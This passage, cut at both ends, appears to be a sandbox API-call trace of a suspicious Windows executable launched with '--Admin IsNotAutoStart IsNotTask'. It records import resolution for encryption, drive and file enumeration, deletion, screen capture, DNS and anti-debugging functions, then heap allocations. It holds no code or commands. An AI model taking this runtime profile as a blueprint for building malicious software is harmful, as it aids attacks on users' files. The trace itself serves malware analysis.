(hModule=0x76e10000, lpProcName="CopyFileW") returned 0x76e4830d [0071.119] GetProcAddress (hModule=0x76e10000, lpProcName="FormatMessageW") returned 0x76e24620 [0071.119] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpynW") returned 0x76e4d556 [0071.119] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessA") returned 0x76e21072 [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="TerminateProcess") returned 0x76e3d802 [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="ReadFile") returned 0x76e23ed3 [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileW") returned 0x76e23f5c [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatA") returned 0x76e42b7a [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentVariableA") returned 0x76e233a0 [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcmpW") returned 0x76e25929 [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="MultiByteToWideChar") returned 0x76e2192e [0071.120] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenW") returned 0x76e21700 [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="FlushFileBuffers") returned 0x76e2469b [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="GetShortPathNameA") returned 0x76e4594d [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileSizeEx") returned 0x76e259e2 [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="GetLastError") returned 0x76e211c0 [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="SetLastError") returned 0x76e211a9 [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcAddress") returned 0x76e21222 [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="VirtualAlloc") returned 0x76e21856 [0071.121] GetProcAddress (hModule=0x76e10000, lpProcName="MoveFileW") returned 0x76e39af0 [0071.122] GetProcAddress (hModule=0x76e10000, lpProcName="FindClose") returned 0x76e24442 [0071.122] GetProcAddress (hModule=0x76e10000, lpProcName="Process32FirstW") returned 0x76e48baf [0071.122] GetProcAddress (hModule=0x76e10000, lpProcName="LocalAlloc") returned 0x76e2168c [0071.122] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventW") returned 0x76e2183e [0071.122] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameA") returned 0x76e214b1 [0071.122] GetProcAddress (hModule=0x76e10000, lpProcName="Process32NextW") returned 0x76e4896c [0071.123] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcatW") returned 0x76e4828e [0071.123] GetProcAddress (hModule=0x76e10000, lpProcName="CreateMutexA") returned 0x76e24c6b [0071.123] GetProcAddress (hModule=0x76e10000, lpProcName="FindNextFileW") returned 0x76e254ee [0071.123] GetProcAddress (hModule=0x76e10000, lpProcName="CreateToolhelp32Snapshot") returned 0x76e4735f [0071.123] GetProcAddress (hModule=0x76e10000, lpProcName="SetEnvironmentVariableA") returned 0x76e2e331 [0071.123] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileW") returned 0x76e289b3 [0071.124] GetProcAddress (hModule=0x76e10000, lpProcName="LocalFree") returned 0x76e22d3c [0071.124] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyW") returned 0x76e43102 [0071.124] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteFileA") returned 0x76e25444 [0071.124] GetProcAddress (hModule=0x76e10000, lpProcName="lstrcpyA") returned 0x76e42a9d [0071.124] GetProcAddress (hModule=0x76e10000, lpProcName="SetPriorityClass") returned 0x76e3cf28 [0071.124] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcess") returned 0x76e21809 [0071.125] GetProcAddress (hModule=0x76e10000, lpProcName="GetComputerNameW") returned 0x76e2dd0e [0071.125] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalDrives") returned 0x76e25371 [0071.125] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleFileNameW") returned 0x76e24950 [0071.125] GetProcAddress (hModule=0x76e10000, lpProcName="SetStdHandle") returned 0x76ea454f [0071.125] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersion") returned 0x76e24467 [0071.125] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryA") returned 0x76e4d526 [0071.125] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThread") returned 0x76e234d5 [0071.126] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringW") returned 0x76e23bca [0071.126] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatW") returned 0x76e3f481 [0071.126] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatW") returned 0x76e434d7 [0071.126] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesW") returned 0x76ea425f [0071.126] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLCID") returned 0x76e23da5 [0071.126] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocale") returned 0x76e3ce46 [0071.126] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoW") returned 0x76e23c42 [0071.127] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreW") returned 0x76e3ca5a [0071.127] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleW") returned 0x76e234b0 [0071.127] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount") returned 0x76e2110c [0071.127] GetProcAddress (hModule=0x76e10000, lpProcName="TlsFree") returned 0x76e23587 [0071.127] GetProcAddress (hModule=0x76e10000, lpProcName="TlsSetValue") returned 0x76e214fb [0071.127] GetProcAddress (hModule=0x76e10000, lpProcName="TlsGetValue") returned 0x76e211e0 [0071.127] GetProcAddress (hModule=0x76e10000, lpProcName="TlsAlloc") returned 0x76e249ad [0071.128] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76e21916 [0071.128] GetProcAddress (hModule=0x76e10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76e287c9 [0071.128] GetProcAddress (hModule=0x76e10000, lpProcName="UnhandledExceptionFilter") returned 0x76e4772f [0071.128] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleA") returned 0x76e21245 [0071.151] GetProcAddress (hModule=0x76e10000, lpProcName="GetVersionExA") returned 0x76e23519 [0071.154] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalMemoryStatus") returned 0x76e28b6d [0071.154] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryA") returned 0x76e249d7 [0071.154] GetProcAddress (hModule=0x76e10000, lpProcName="FlushConsoleInputBuffer") returned 0x76ec7a9f [0071.154] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForSingleObject") returned 0x76e21136 [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="CreateDirectoryW") returned 0x76e24259 [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointerEx") returned 0x76e3c807 [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="CreateProcessW") returned 0x76e2103d [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibrary") returned 0x76e234c8 [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="SetErrorMode") returned 0x76e21b00 [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="lstrlenA") returned 0x76e25a4b [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="SetFilePointer") returned 0x76e217d1 [0071.155] GetProcAddress (hModule=0x76e10000, lpProcName="FindFirstFileW") returned 0x76e24435 [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleMode") returned 0x76e3a77d [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="GetCommandLineW") returned 0x76e25223 [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="GetNumberOfConsoleInputEvents") returned 0x76ec793f [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="PeekConsoleInputA") returned 0x76ec6f0d [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="FreeEnvironmentStringsW") returned 0x76e251cb [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="GetEnvironmentStringsW") returned 0x76e251e3 [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessId") returned 0x76e211f8 [0071.156] GetProcAddress (hModule=0x76e10000, lpProcName="QueryPerformanceCounter") returned 0x76e21725 [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeZoneInformation") returned 0x76e2465a [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="RaiseException") returned 0x76e258a6 [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="GetStringTypeW") returned 0x76e21946 [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleCP") returned 0x76ec7bff [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleW") returned 0x76ec739a [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="GetConsoleMode") returned 0x76e21328 [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="HeapSize") returned 0x77353002 [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="LoadLibraryExW") returned 0x76e2495d [0071.157] GetProcAddress (hModule=0x76e10000, lpProcName="OutputDebugStringW") returned 0x76e4d1d4 [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="SetConsoleCtrlHandler") returned 0x76e28a09 [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="RtlUnwind") returned 0x76e4d1c3 [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="FatalAppExitA") returned 0x76ea4691 [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="GetStartupInfoW") returned 0x76e24d40 [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="GetExitCodeProcess") returned 0x76e3174d [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringW") returned 0x76e217b9 [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="DeleteCriticalSection") returned 0x773545f5 [0071.158] GetProcAddress (hModule=0x76e10000, lpProcName="AreFileApisANSI") returned 0x76ea40d1 [0071.159] GetProcAddress (hModule=0x76e10000, lpProcName="ExitProcess") returned 0x76e27a10 [0071.159] GetProcAddress (hModule=0x76e10000, lpProcName="GetProcessHeap") returned 0x76e214e9 [0071.159] GetProcAddress (hModule=0x76e10000, lpProcName="HeapReAlloc") returned 0x77361f6e [0071.159] GetProcAddress (hModule=0x76e10000, lpProcName="GlobalFree") returned 0x76e25558 [0071.159] GetProcAddress (hModule=0x76e10000, lpProcName="SetEndOfFile") returned 0x76e3ce2e [0071.159] GetProcAddress (hModule=0x76e10000, lpProcName="ReadConsoleInputA") returned 0x76ec6f53 [0071.159] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0071.160] GetProcAddress (hModule=0x76e10000, lpProcName="HeapFree") returned 0x76e214c9 [0071.160] GetProcAddress (hModule=0x76e10000, lpProcName="HeapAlloc") returned 0x7734e026 [0071.160] GetProcAddress (hModule=0x76e10000, lpProcName="EnterCriticalSection") returned 0x773422b0 [0071.160] GetProcAddress (hModule=0x76e10000, lpProcName="LeaveCriticalSection") returned 0x77342270 [0071.160] GetProcAddress (hModule=0x76e10000, lpProcName="GetStdHandle") returned 0x76e251b3 [0071.160] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileType") returned 0x76e23531 [0071.160] GetProcAddress (hModule=0x76e10000, lpProcName="GetModuleHandleExW") returned 0x76e24a6f [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="WriteConsoleW") returned 0x76e47aca [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="EncodePointer") returned 0x77360fcb [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="DecodePointer") returned 0x77359d35 [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76e23509 [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="IsDebuggerPresent") returned 0x76e24a5d [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="IsProcessorFeaturePresent") returned 0x76e25235 [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidCodePage") returned 0x76e24493 [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="GetACP") returned 0x76e2179c [0071.161] GetProcAddress (hModule=0x76e10000, lpProcName="GetOEMCP") returned 0x76e4d1a1 [0071.162] GetProcAddress (hModule=0x76e10000, lpProcName="GetCPInfo") returned 0x76e25189 [0071.162] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThread") returned 0x76e217ec [0071.162] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentThreadId") returned 0x76e21450 [0071.162] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76780000 [0071.162] GetProcAddress (hModule=0x76780000, lpProcName="PeekMessageW") returned 0x767a05ba [0071.162] GetProcAddress (hModule=0x76780000, lpProcName="PostThreadMessageW") returned 0x76798bff [0071.162] GetProcAddress (hModule=0x76780000, lpProcName="DefWindowProcW") returned 0x773525dd [0071.162] GetProcAddress (hModule=0x76780000, lpProcName="DispatchMessageW") returned 0x7679787b [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="UpdateWindow") returned 0x767a3559 [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="CreateWindowExW") returned 0x76798a29 [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="LoadCursorW") returned 0x767988f7 [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="IsWindow") returned 0x76797136 [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="ShowWindow") returned 0x767a0dfb [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="RegisterClassExW") returned 0x7679b17d [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="PostQuitMessage") returned 0x76799abb [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="GetMessageW") returned 0x767978e2 [0071.163] GetProcAddress (hModule=0x76780000, lpProcName="DestroyWindow") returned 0x76799a55 [0071.164] GetProcAddress (hModule=0x76780000, lpProcName="SendMessageW") returned 0x76799679 [0071.164] GetProcAddress (hModule=0x76780000, lpProcName="GetProcessWindowStation") returned 0x76799eea [0071.164] GetProcAddress (hModule=0x76780000, lpProcName="GetUserObjectInformationW") returned 0x76798068 [0071.164] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxA") returned 0x767efd1e [0071.164] GetProcAddress (hModule=0x76780000, lpProcName="GetDesktopWindow") returned 0x767a0a19 [0071.164] GetProcAddress (hModule=0x76780000, lpProcName="MessageBoxW") returned 0x767efd3f [0071.164] GetProcAddress (hModule=0x76780000, lpProcName="TranslateMessage") returned 0x76797809 [0071.164] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x754b0000 [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="RegCloseKey") returned 0x754c469d [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="CloseServiceHandle") returned 0x754c369c [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="GetUserNameW") returned 0x754c157a [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="ReportEventA") returned 0x754b3ee9 [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="RegisterEventSourceA") returned 0x754c2d46 [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="DeregisterEventSource") returned 0x754c35dd [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="CryptHashData") returned 0x754bdf36 [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="RegSetValueExW") returned 0x754c14d6 [0071.165] GetProcAddress (hModule=0x754b0000, lpProcName="CryptDestroyHash") returned 0x754bdf66 [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="ControlService") returned 0x754d7144 [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="RegOpenKeyExW") returned 0x754c468d [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="CryptCreateHash") returned 0x754bdf4e [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="CryptImportKey") returned 0x754bc532 [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="QueryServiceStatus") returned 0x754c2a86 [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="RegQueryValueExW") returned 0x754c46ad [0071.166] GetProcAddress (hModule=0x754b0000, lpProcName="CryptReleaseContext") returned 0x754be124 [0071.167] GetProcAddress (hModule=0x754b0000, lpProcName="OpenServiceW") returned 0x754bca4c [0071.167] GetProcAddress (hModule=0x754b0000, lpProcName="OpenSCManagerW") returned 0x754bca64 [0071.167] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextW") returned 0x754bdf14 [0071.167] GetProcAddress (hModule=0x754b0000, lpProcName="CryptGetHashParam") returned 0x754bdf7e [0071.167] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x75670000 [0071.171] GetProcAddress (hModule=0x75670000, lpProcName="SHGetPathFromIDListW") returned 0x757017bf [0071.171] GetProcAddress (hModule=0x75670000, lpProcName="SHGetSpecialFolderLocation") returned 0x756fe141 [0071.172] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteA") returned 0x758b7078 [0071.172] GetProcAddress (hModule=0x75670000, lpProcName="ShellExecuteExW") returned 0x75691e46 [0071.172] GetProcAddress (hModule=0x75670000, lpProcName="CommandLineToArgvW") returned 0x75689ee8 [0071.172] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathA") returned 0x75787804 [0071.172] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x762c0000 [0071.172] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitialize") returned 0x762db636 [0071.172] GetProcAddress (hModule=0x762c0000, lpProcName="CoInitializeSecurity") returned 0x762e7259 [0071.173] GetProcAddress (hModule=0x762c0000, lpProcName="CoUninitialize") returned 0x763086d3 [0071.173] GetProcAddress (hModule=0x762c0000, lpProcName="CoCreateInstance") returned 0x76309d0b [0071.173] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x769d0000 [0071.173] GetProcAddress (hModule=0x769d0000, lpProcName=0x6) returned 0x769d3e59 [0071.173] GetProcAddress (hModule=0x769d0000, lpProcName=0x8) returned 0x769d3ed5 [0071.173] GetProcAddress (hModule=0x769d0000, lpProcName=0x9) returned 0x769d3eae [0071.173] GetProcAddress (hModule=0x769d0000, lpProcName=0xc8) returned 0x769d3f21 [0071.174] GetProcAddress (hModule=0x769d0000, lpProcName=0xca) returned 0x769dfd6b [0071.174] GetProcAddress (hModule=0x769d0000, lpProcName=0xc9) returned 0x769d4af8 [0071.174] GetProcAddress (hModule=0x769d0000, lpProcName=0xc) returned 0x769d5dee [0071.174] GetProcAddress (hModule=0x769d0000, lpProcName=0x2) returned 0x769d4642 [0071.174] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x744f0000 [0071.196] GetProcAddress (hModule=0x744f0000, lpProcName="GetAdaptersInfo") returned 0x744f9263 [0071.196] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75360000 [0071.199] GetProcAddress (hModule=0x75360000, lpProcName=0xc) returned 0x7536b131 [0071.199] GetProcAddress (hModule=0x75360000, lpProcName=0xb) returned 0x7536311b [0071.199] GetProcAddress (hModule=0x75360000, lpProcName=0x34) returned 0x75377673 [0071.199] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74450000 [0071.205] GetProcAddress (hModule=0x74450000, lpProcName="DnsFree") returned 0x7445436b [0071.205] GetProcAddress (hModule=0x74450000, lpProcName="DnsQuery_W") returned 0x7446572c [0071.205] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x75550000 [0071.206] GetProcAddress (hModule=0x75550000, lpProcName="CryptStringToBinaryA") returned 0x75585d77 [0071.206] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x752d0000 [0071.206] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteObject") returned 0x752e5689 [0071.206] GetProcAddress (hModule=0x752d0000, lpProcName="GetObjectA") returned 0x752e85d4 [0071.207] GetProcAddress (hModule=0x752d0000, lpProcName="SelectObject") returned 0x752e4f70 [0071.207] GetProcAddress (hModule=0x752d0000, lpProcName="GetDeviceCaps") returned 0x752e4de0 [0071.207] GetProcAddress (hModule=0x752d0000, lpProcName="GetBitmapBits") returned 0x752ec155 [0071.207] GetProcAddress (hModule=0x752d0000, lpProcName="BitBlt") returned 0x752e5ea6 [0071.207] GetProcAddress (hModule=0x752d0000, lpProcName="DeleteDC") returned 0x752e58b3 [0071.207] GetProcAddress (hModule=0x752d0000, lpProcName="CreateDCA") returned 0x752e7bcc [0071.207] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleDC") returned 0x752e54f4 [0071.208] GetProcAddress (hModule=0x752d0000, lpProcName="CreateCompatibleBitmap") returned 0x752e5f49 [0071.208] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x74390000 [0071.216] GetProcAddress (hModule=0x74390000, lpProcName="atexit") returned 0x743ac544 [0071.216] atexit (param_1=0x1e70920) returned 0 [0071.235] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f3e8 | out: lpSystemTimeAsFileTime=0x18f3e8*(dwLowDateTime=0x97e5e120, dwHighDateTime=0x1d5d6b4)) [0071.236] GetCurrentThreadId () returned 0x9f4 [0071.236] GetCurrentProcessId () returned 0x6f8 [0071.236] QueryPerformanceCounter (in: lpPerformanceCount=0x18f3e0 | out: lpPerformanceCount=0x18f3e0*=21172260103) returned 1 [0071.298] GetStartupInfoW (in: lpStartupInfo=0x18f378 | out: lpStartupInfo=0x18f378*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76e23519, hStdOutput=0x7733fd35, hStdError=0x773a7daf)) [0071.319] GetProcessHeap () returned 0x630000 [0071.433] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76e10000 [0071.433] GetProcAddress (hModule=0x76e10000, lpProcName="FlsAlloc") returned 0x76e24f2b [0071.434] GetProcAddress (hModule=0x76e10000, lpProcName="FlsFree") returned 0x76e2359f [0071.434] GetProcAddress (hModule=0x76e10000, lpProcName="FlsGetValue") returned 0x76e21252 [0071.434] GetProcAddress (hModule=0x76e10000, lpProcName="FlsSetValue") returned 0x76e24208 [0071.434] GetProcAddress (hModule=0x76e10000, lpProcName="InitializeCriticalSectionEx") returned 0x76e24d28 [0071.434] GetProcAddress (hModule=0x76e10000, lpProcName="CreateEventExW") returned 0x76ea410b [0071.434] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSemaphoreExW") returned 0x76ea4195 [0071.434] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadStackGuarantee") returned 0x76e2d31f [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolTimer") returned 0x76e3ee7e [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolTimer") returned 0x7736441c [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7738c50e [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolTimer") returned 0x7738c381 [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="CreateThreadpoolWait") returned 0x76e3f088 [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="SetThreadpoolWait") returned 0x773705d7 [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="CloseThreadpoolWait") returned 0x7738ca24 [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="FlushProcessWriteBuffers") returned 0x77340b8c [0071.435] GetProcAddress (hModule=0x76e10000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x773ffde8 [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentProcessorNumber") returned 0x77391e1d [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="GetLogicalProcessorInformation") returned 0x76ea4761 [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="CreateSymbolicLinkW") returned 0x76e9cd11 [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="EnumSystemLocalesEx") returned 0x76ea424f [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="CompareStringEx") returned 0x76ea46b1 [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="GetDateFormatEx") returned 0x76eb6676 [0071.436] GetProcAddress (hModule=0x76e10000, lpProcName="GetLocaleInfoEx") returned 0x76ea4751 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="GetTimeFormatEx") returned 0x76eb65f1 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="GetUserDefaultLocaleName") returned 0x76ea47c1 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="IsValidLocaleName") returned 0x76ea47e1 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="LCMapStringEx") returned 0x76ea47f1 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="GetCurrentPackageId") returned 0x0 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="GetTickCount64") returned 0x76e3eee0 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0071.437] GetProcAddress (hModule=0x76e10000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0071.438] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3bc) returned 0x64f468 [0071.438] GetCurrentThreadId () returned 0x9f4 [0071.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x644330 [0071.444] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x800) returned 0x64f830 [0071.488] GetStartupInfoW (in: lpStartupInfo=0x18f348 | out: lpStartupInfo=0x18f348*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x7bc735c7, hStdError=0x58)) [0071.488] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0071.489] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0071.489] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0071.489] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe\" --Admin IsNotAutoStart IsNotTask" [0071.489] GetEnvironmentStringsW () returned 0x650038* [0071.489] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xaca) returned 0x650b10 [0071.495] FreeEnvironmentStringsW (penv=0x650038) returned 1 [0071.501] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe")) returned 0x50 [0071.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xf8) returned 0x6515e8 [0071.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x98) returned 0x6516e8 [0071.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x3e) returned 0x644fc0 [0071.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6c) returned 0x651788 [0071.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x6e) returned 0x651800 [0071.501] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x78) returned 0x6416d0 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x62) returned 0x651878 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x64b130 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x48) returned 0x646d18 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x28) returned 0x64ab20 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1a) returned 0x64f220 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x4a) returned 0x6518e8 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x72) returned 0x641750 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x30) returned 0x64b168 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x2e) returned 0x64b1a0 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, Size=0x1c) returned 0x64f248 [0071.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x8, 